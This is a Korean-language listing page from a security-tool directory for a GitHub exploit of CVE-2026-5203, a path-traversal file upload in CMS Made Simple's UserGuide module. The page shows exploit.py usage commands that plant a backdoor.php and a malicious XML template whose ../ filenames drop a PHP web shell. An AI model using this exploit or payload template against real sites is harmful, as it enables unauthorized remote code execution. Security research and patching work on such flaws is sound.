Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-5203 — CMS Made Simple의 CVE-2026-5203에 대한 익스플로잇으로, 경로 탐색 및 임의 파일 업로드를 활용하여 대화형 셸로 원격 코드 실행을 달성합니다. | Kitploit
도구/GitHubGitHub/caginkyr/cve-2026-5203
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubcaginkyr/cve-2026-5203

CVE-2026-5203

CMS Made Simple의 CVE-2026-5203에 대한 익스플로잇으로, 경로 탐색 및 임의 파일 업로드를 활용하여 대화형 셸로 원격 코드 실행을 달성합니다.

저장소 보기
34개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-5203 — CMS Made Simple ≤ 2.2.22 RCE (경로 탐색 + 임의 파일 업로드)

CVSS Version Type

요약

CMS Made Simple ≤ 2.2.22의 UserGuide 모듈 XML 가져오기 기능은 사용자가 제공한 파일 이름을 검증하지 않아, 인증된 관리자가 경로 탐색 시퀀스를 통해 서버 파일 시스템 어디에든 임의의 파일(예: PHP 웹 셸)을 업로드할 수 있습니다.

필드값
유형경로 탐색 / 임의 파일 업로드 → RCE
구성 요소UserGuide 모듈 — XML 가져오기
영향을 받는 파일modules/UserGuide/lib/class.UserGuideImporterExporter.php
CVSS v3.17.2 HIGH — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
인증 필요예 (관리자)

취약한 코드

// modules/UserGuide/lib/class.UserGuideImporterExporter.php (~L250-280)
$filename = (string) $xmlFile->filename;
$isdir    = (string) $xmlFile->isdir;   

이 함수는 Base64로 디코딩된 콘텐츠를 공격자가 제어하는 경로에 직접 씁니다.


사용법

python exploit.py <base_url> <admin_url> <username> <password> [upload_path]

예시:

# 기본 경로
python exploit.py http://target.com http://target.com/admin admin password123

# 사용자 정의 업로드 경로
python exploit.py http://target.com http://target.com/admin admin password123 \
  ../../../../../../var/www/html/backdoor.php

웹 셸이 업로드 후 접근 가능하면 대화형 셸이 자동으로 시작됩니다.


악성 XML 구조

<?xml version="1.0" encoding="UTF-8"?>
<modulecontent>
  <module>UserGuide</module>
  <version>1.3</version>
  <files>
    <file>
      <filename>../../../webshell.php</filename>
      <isdir>0</isdir>
      <data>[BASE64_ENCODED_PHP_CODE]</data>
    </file>
  </files>
</modulecontent>
도구 다운로드